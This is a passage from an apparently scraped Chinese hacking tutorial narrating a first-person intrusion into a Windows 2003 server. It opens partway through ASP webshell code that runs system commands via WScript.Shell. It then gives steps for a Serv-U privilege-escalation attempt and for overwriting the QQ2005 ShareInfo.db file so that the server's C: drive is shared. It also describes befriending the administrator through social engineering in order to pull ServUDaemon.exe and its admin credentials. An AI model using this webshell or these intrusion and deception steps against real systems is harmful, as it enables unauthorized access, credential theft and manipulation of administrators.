利用QQ文件共享漏洞入侵 Windows2003

p;" /c " & DefCmd & " > " & szTempFile, 0, True) 
Set fs = CreateObject("Scripting.FileSystemObject") 
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0) 
aaa=Server.HTMLEncode(oFilelcx.ReadAll) 
oFilelcx.Close 
Call fso.DeleteFile(szTempFile, True)  Qkoo.Cn
SI=SI&aaa 
end if 
End If 
SI=SI&chr(13)&"</textarea>" 
SI=SI&"SHELL路径：<input name='SP' value='"&ShellPath&"' Style='width:70%'> " 
SI=SI&"<input type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell</form>" 
Response.Write SI 
End Function

　　利用时只需在shell路径中指定上传的cmd.exe路径，再选中选项Wscript就能运行一些所需权限较低的系统命令，如“net start”或者“netstat -an”，依次运行这两个命令后Webshell回显了众多服务，包括Serv-U FTP Server。
　　活动端口列表中又出现了43958端口，于是我自然想到了神通广大的Serv-u ftp Server本地权限提升漏洞。可真正用到的ftp本地权限提升工具在执行系统命令时，却出现了530错误提示。看来管理员或者其他人对Serv-u打上了布丁或者做了某些安全配置。 Wtto.Net

　　为了知道究竟是怎样的安全配置，上网查了查相关文章，其中有一篇《Serv-u ftp Server 本地权限提升漏洞的终极防范》很受欢迎，被多方转载，作者是世外高人xiaolu。从错误提示看很有可能做了该文所谓的终极防范，即对 ServUDaemon.exe中默认的管理员或密码进行了修改。 Wtto.Net

　　当然这只是假设，只有将目标服务器上的ServUDaemon.exe下载下来看看具体配置才能确定，但是安装有Serv-u的C盘禁止访问，包括Programe files 目录，权限提升再次受阻。 Wtto.Net

　　三、利用QQ2005共享文件漏洞将权限提升到底 Wtto.Net

　　再次翻了翻D盘，又见到了那个很少能在服务器中看到的Tencent文件夹。查看whatsnew.txt。

　　得知QQ的版本是QQ2005 Beta1，几个于相关文件的创建时间也说明网管最近在服务器上登陆过QQ。难道只能用QQ？经过一番思索，终于想到一个可以利用的QQ2005在文件共享功能上的一则漏洞。

Wtto.Net

　　该漏洞是随着QQ2005贺岁版新增功能出现的。可以将其危害描述为：利用该漏洞，攻击者可以浏览，读取用户系统中的任意文件（如sam文件、数据备份文件、敏感信息文件）。影响系统：安装有QQ2005贺岁版以上的所有Windows系列操作系统。 Wtto.Net

　　具体利用方法是：先在本机登陆自己的QQ，调出“QQ菜单”，选择工具－>设置共享，指定C:\或者其他任何有利用价值的分区为共享文件，完成后关闭QQ，找到安装目录下的以QQ帐号命名的文件夹内“ShareInfo.db”文件。上传覆盖目标服务器上相同文件（如：D:\ Tencent\QQ\654321\ShareInfo.db）。这样，当网管在服务器上登陆QQ时就会向好友开放C盘为共享目录。

　　因为陌生人是不能共享对方文件，所以还需要用社会工程学申请将管理员加为好友(理由当然越可信越好)。如果管理员通过请求，服务器的C盘会以 QQ共享文件目录的名义被共享，原本不能通过WEBSHELL访问的ServUDaemon.exe文件就能被下载，遇到阻碍的权限提升之路又能继续了。

　　当晚管理员就通过了申请，将我添加为好友。珊瑚虫QQ上显示的IP正是目标服务器的IP，于是下载了ServUDaemon.exe文件，用 UE打开后查找127.0.0.1，发现默认配置下的内置帐户“LocalAdministrator”果然被改成了 “LocalAdministrus